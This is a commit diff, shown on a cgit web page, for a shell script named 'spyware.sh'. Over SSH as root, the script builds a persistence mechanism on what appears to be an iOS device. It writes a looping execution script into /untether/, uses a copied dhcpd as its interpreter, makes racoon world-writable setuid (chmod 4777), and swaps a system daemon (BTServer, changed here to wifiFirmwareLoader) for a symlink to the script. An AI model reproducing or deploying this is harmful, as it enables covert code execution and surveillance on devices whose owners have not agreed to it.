summaryrefslogtreecommitdiff
path: root/spyware.sh
diff options
context:
space:
mode:
Diffstat (limited to 'spyware.sh')
-rwxr-xr-xspyware.sh8
1 files changed, 4 insertions, 4 deletions
diff --git a/spyware.sh b/spyware.sh
index fb79486..dac5939 100755
--- a/spyware.sh
+++ b/spyware.sh
@@ -3,7 +3,7 @@
ssh root@localhost -p 2222 << EOF
rm -rf /untether/
mkdir /untether/
-echo "#!/usr/local/bin/scripter -q -cf" > /untether/get_code_exec
+echo "#!/usr/local/bin/scripter_ -q -cf" > /untether/get_code_exec
echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
@@ -32,8 +32,8 @@ echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
echo "execute(\"/untether/get_code_exec\");" >> /untether/get_code_exec
chmod +x /untether/get_code_exec
mkdir /usr/local/bin/
-cp -p /usr/libexec/dhcpd /usr/local/bin/scripter
+cp -p /usr/libexec/dhcpd /usr/local/bin/scripter_
chmod 4777 /usr/sbin/racoon
-mv /usr/sbin/BTServer /usr/sbin/BTServer_
-ln -s /untether/get_code_exec /usr/sbin/BTServer
+mv /usr/libexec/wifiFirmwareLoader /usr/libexec/wifiFirmwareLoader_
+ln -s /untether/get_code_exec /usr/libexec/wifiFirmwareLoader
EOF \ No newline at end of file